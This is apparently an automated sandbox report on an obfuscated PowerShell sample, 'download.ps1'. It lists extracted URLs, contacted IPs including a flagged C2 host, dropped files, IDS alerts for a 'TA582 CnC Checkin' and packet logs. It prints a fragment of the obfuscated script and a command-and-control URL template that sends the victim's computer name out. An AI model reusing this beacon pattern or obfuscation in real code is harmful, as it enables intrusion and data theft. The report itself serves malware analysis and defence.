                                          https://apis.google.compowershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBCCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1719127106.00000287DBAF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBCCB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBD5E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://go.micropowershell.exe, 00000000.00000002.1719127106.00000287DEB06000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://contoso.com/Iconpowershell.exe, 00000000.00000002.1767672083.00000287EBB62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://0.googlepowershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.google.com/preferences?hl=enpowershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://0.google.powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://$tjwe1cgqifoz4l3/$6tmq9zsu3l0ofg4.php?id=$env:computername&key=$nwbirdhamkxfje&s=527powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DF00E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DECEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      http://0.google.com/powershell.exe, 00000000.00000002.1719127106.00000287DD4AC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.1767672083.00000287EBDEB000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.1719127106.00000287DD450000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1719127106.00000287DBD18000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.1719127106.00000287DDB81000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      https://aka.ms/pscore68powershell.exe, 00000000.00000002.1719127106.00000287DBAF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.1719127106.00000287DD56A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high

                                                                                                          World Map of Contacted IPs

                                                                                                          • No. of IPs < 25%
                                                                                                          • 25% < No. of IPs < 50%
                                                                                                          • 50% < No. of IPs < 75%
                                                                                                          • 75% < No. of IPs

                                                                                                          Public IPs

                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                          45.61.136.138
                                                                                                          		kdemjgebjimkanl.topUnited States
                                                                                                          		40676AS40676UStrue
                                                                                                          142.250.185.132
                                                                                                          		www.google.comUnited States
                                                                                                          		15169GOOGLEUSfalse

                                                                                                          General Information

                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                          Analysis ID:1582439
                                                                                                          Start date and time:2024-12-30 16:13:06 +01:00
                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                          Overall analysis duration:0h 4m 17s
                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                          Report type:full
                                                                                                          Cookbook file name:default.jbs
                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                          Number of analysed new started processes analysed:7
                                                                                                          Number of new started drivers analysed:0
                                                                                                          Number of existing processes analysed:0
                                                                                                          Number of existing drivers analysed:0
                                                                                                          Number of injected processes analysed:0
                                                                                                          Technologies:
                                                                                                          • HCA enabled
                                                                                                          • EGA enabled
                                                                                                          • AMSI enabled
                                                                                                          Analysis Mode:default
                                                                                                          Analysis stop reason:Timeout
                                                                                                          Sample name:download.ps1
                                                                                                          Detection:MAL
                                                                                                          Classification:mal68.evad.winPS1@2/7@2/2
                                                                                                          EGA Information:Failed
                                                                                                          HCA Information:
                                                                                                          • Successful, ratio: 80%
                                                                                                          • Number of executed functions: 10
                                                                                                          • Number of non-executed functions: 2
                                                                                                          Cookbook Comments:
                                                                                                          • Found application associated with file extension: .ps1

                                                                                                          Warnings

                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 20.12.23.50, 13.107.246.45
                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                          • Execution Graph export aborted for target powershell.exe, PID 2008 because it is empty
                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                          • VT rate limit hit for: download.ps1

                                                                                                          Simulations

                                                                                                          Behavior and APIs

                                                                                                          TimeTypeDescription
                                                                                                          10:13:57API Interceptor41x Sleep call for process: powershell.exe modified

                                                                                                          Joe Sandbox View / Context

                                                                                                          IPs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • gajaechkfhfghal.top/he0j3zgk4xhtr.php?id=computer&key=74358253620&s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • gajaechkfhfghal.top/u642xz31jvhtr.php?id=user-PC&key=84925345116&s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • gajaechkfhfghal.top/fw59ib1u2yhtr.php?id=computer&key=64956393081&s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • gajaechkfhfghal.top/yfshl0dga3htr.php?id=user-PC&key=122775442322&s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • gajaechkfhfghal.top/6v28jh9yqnhtr.php?id=computer&key=74624839462&s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • gajaechkfhfghal.top/s7rtm36opvhtr.php?id=computer&key=10840995318&s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • gajaechkfhfghal.top/26te7apny8htr.php?id=user-PC&key=60099241868&s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • gajaechkfhfghal.top/fm2yw8l13shtr.php?id=user-PC&key=91595968094&s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • gajaechkfhfghal.top/zm520bcoi4htr.php?id=computer&key=77853249548&s=527
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • gajaechkfhfghal.top/w4lhrjfzyvhtr.php?id=user-PC&key=102920557732&s=527

                                                                                                          Domains

                                                                                                          No context

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          AS40676USloligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                          • 107.176.168.227
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138
                                                                                                          download.ps1Get hashmaliciousUnknownBrowse
                                                                                                          • 45.61.136.138

                                                                                                          JA3 Fingerprints

                                                                                                          No context

                                                                                                          Dropped Files

                                                                                                          No context

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):64
                                                                                                          Entropy (8bit):1.1940658735648508
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:NlllulVmdtZ:NllUM
                                                                                                          MD5:013016A37665E1E37F0A3576A8EC8324
                                                                                                          SHA1:260F55EC88E3C4D384658F3C18C7FDEF202E47DD
                                                                                                          SHA-256:20C6A3C78E9B98F92B0F0AA8C338FF0BAC1312CBBFE5E65D4C940B828AC92FD8
                                                                                                          SHA-512:99063E180730047A4408E3EF8ABBE1C53DEC1DF04469DFA98666308F60F8E35DEBF7E32066FE0DD1055E1181167061B3512EEE4FE72D0CD3D174E3378BA62ED8
                                                                                                          Malicious:false
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:@...e................................................@..........

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lrasqh4.is5.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_av0ccl0u.0rz.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Reputation:high, very likely benign file
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j0hajbsj.hqp.ps1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pv5eqzin.54w.psm1

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:ASCII text, with no line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):60
                                                                                                          Entropy (8bit):4.038920595031593
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                          Malicious:false
                                                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2C2IUO7P4GHNLXQWCNN2.temp

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6221
                                                                                                          Entropy (8bit):3.7336278769660507
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lnE0l4oDLPr3C4U28HjgQukvhkvklCywKmd/YOKl1ZCSogZo5fYOKl1ZCSogZod1:Nz/D33CxHHykvhkvCCtpYOKVH2YOKVHm
                                                                                                          MD5:3E1EE8A24AAE6613C4FB84A039C97168
                                                                                                          SHA1:BBADC63864C9E6E314FC874CB9672556CA5E1460
                                                                                                          SHA-256:53A0DD4F74AA4B1CC8356F528C6C1BC8EB99E69F3A380644E825052C16EC2BA2
                                                                                                          SHA-512:BC7C7F32FA4AA3962D9C79789B3821473898BD92D61967A4FC97762BC8854D07DF1B141B3C45A1570B3D0E8E72E333B9CED0427AE9DFC6166906E3C47A1F03F4
                                                                                                          Malicious:false
                                                                                                          Preview:...................................FL..................F.".. ...-/.v....Q..q.Z..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....zG m.Z...z!q.Z......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.y...........................%..A.p.p.D.a.t.a...B.V.1......Y.y..Roaming.@......CW.^.Y.y..........................-!..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..........................I...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.y....Q...........

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                          Download File
                                                                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6221
                                                                                                          Entropy (8bit):3.7336278769660507
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lnE0l4oDLPr3C4U28HjgQukvhkvklCywKmd/YOKl1ZCSogZo5fYOKl1ZCSogZod1:Nz/D33CxHHykvhkvCCtpYOKVH2YOKVHm
                                                                                                          MD5:3E1EE8A24AAE6613C4FB84A039C97168
                                                                                                          SHA1:BBADC63864C9E6E314FC874CB9672556CA5E1460
                                                                                                          SHA-256:53A0DD4F74AA4B1CC8356F528C6C1BC8EB99E69F3A380644E825052C16EC2BA2
                                                                                                          SHA-512:BC7C7F32FA4AA3962D9C79789B3821473898BD92D61967A4FC97762BC8854D07DF1B141B3C45A1570B3D0E8E72E333B9CED0427AE9DFC6166906E3C47A1F03F4
                                                                                                          Malicious:false
                                                                                                          Preview:...................................FL..................F.".. ...-/.v....Q..q.Z..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....zG m.Z...z!q.Z......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y.y...........................%..A.p.p.D.a.t.a...B.V.1......Y.y..Roaming.@......CW.^.Y.y..........................-!..R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWP`..Windows.@......CW.^DWP`..........................I...W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.y....Q...........

                                                                                                          Static File Info

                                                                                                          General

                                                                                                          File type:ASCII text, with very long lines (10932), with CRLF line terminators
                                                                                                          Entropy (8bit):6.0041352096486085
                                                                                                          TrID:
                                                                                                            File name:download.ps1
                                                                                                            File size:19'360 bytes
                                                                                                            MD5:f6ab611e38035ef4886d5526e7b9a88a
                                                                                                            SHA1:8569435224c6c52737fb5114a073e62a1a32de21
                                                                                                            SHA256:1522bd349cec20303ee2c3bf624f52e02b179bc5fc597bec575f7d34c213b3e5
                                                                                                            SHA512:92a59ace7998d44c4a204455f82a62bbb85726d181e12448473d688a2ece465e4f820b5e74540578757405fe27b3f8e08dea3aac7ea0de22cb58666c84fe07ca
                                                                                                            SSDEEP:384:pi7M72+q1iA2oXL5SOJacjVBW+bR4S5yPFXaz3t0JVbGAhMTzV:piABYXlNBrJbR4S0XaDWVbGA69
                                                                                                            TLSH:6E925CF537C9ECA2C24EC57B6126BC083722B0FBD5F658C0B3B9996173592806E78D81
                                                                                                            File Content Preview:$nbrvwfiquyj=$executioncontext;$inaltionoroninrereorbeononatatre = -join (0..54 | ForEach-Object {[char]([int]"000001150000011400000119000001120000011800000116000001180000011700000117000001120000011800000110000001110000011700000114000001180000011600000118

                                                                                                            File Icon

                                                                                                            Icon Hash:3270d6baae77db44

                                                                                                            Network Behavior

                                                                                                            Suricata IDS Alerts

                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                            2024-12-30T16:14:02.027665+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.44973045.61.136.13880TCP
                                                                                                            2024-12-30T16:14:02.027665+01002057741ET MALWARE TA582 CnC Checkin1192.168.2.44973045.61.136.13880TCP
                                                                                                            2024-12-30T16:14:02.666431+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.449731142.250.185.13280TCP

                                                                                                            Network Port Distribution

                                                                                                            TCP Packets

                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 30, 2024 16:14:01.355879068 CET4973080192.168.2.445.61.136.138
                                                                                                            Dec 30, 2024 16:14:01.360686064 CET804973045.61.136.138192.168.2.4
                                                                                                            Dec 30, 2024 16:14:01.360749006 CET4973080192.168.2.445.61.136.138
                                                                                                            Dec 30, 2024 16:14:01.363929987 CET4973080192.168.2.445.61.136.138
                                                                                                            Dec 30, 2024 16:14:01.368750095 CET804973045.61.136.138192.168.2.4
                                                                                                            Dec 30, 2024 16:14:01.975390911 CET804973045.61.136.138192.168.2.4
                                                                                                            Dec 30, 2024 16:14:01.985624075 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:01.990513086 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:01.990582943 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:01.990700006 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:01.995517015 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.027664900 CET4973080192.168.2.445.61.136.138
                                                                                                            Dec 30, 2024 16:14:02.666331053 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.666351080 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.666384935 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.666402102 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.666416883 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.666430950 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.666433096 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.666455984 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.666460037 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.666476011 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.666487932 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.666491985 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.666508913 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.666526079 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.666552067 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.671355963 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.671370983 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.671386957 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.671401978 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.671433926 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.671463966 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.752559900 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.753031969 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.753046989 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.753084898 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.753086090 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.753146887 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.755702972 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.755718946 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.755734921 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.755760908 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.763802052 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.763818979 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.763834953 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.763879061 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.763917923 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.768229008 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.768260002 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.768352032 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.768366098 CET8049731142.250.185.132192.168.2.4
                                                                                                            Dec 30, 2024 16:14:02.768399954 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.768426895 CET4973180192.168.2.4142.250.185.132
                                                                                                            Dec 30, 2024 16:14:02.774529934 CET8049731142.250.185.132192.168.2.4
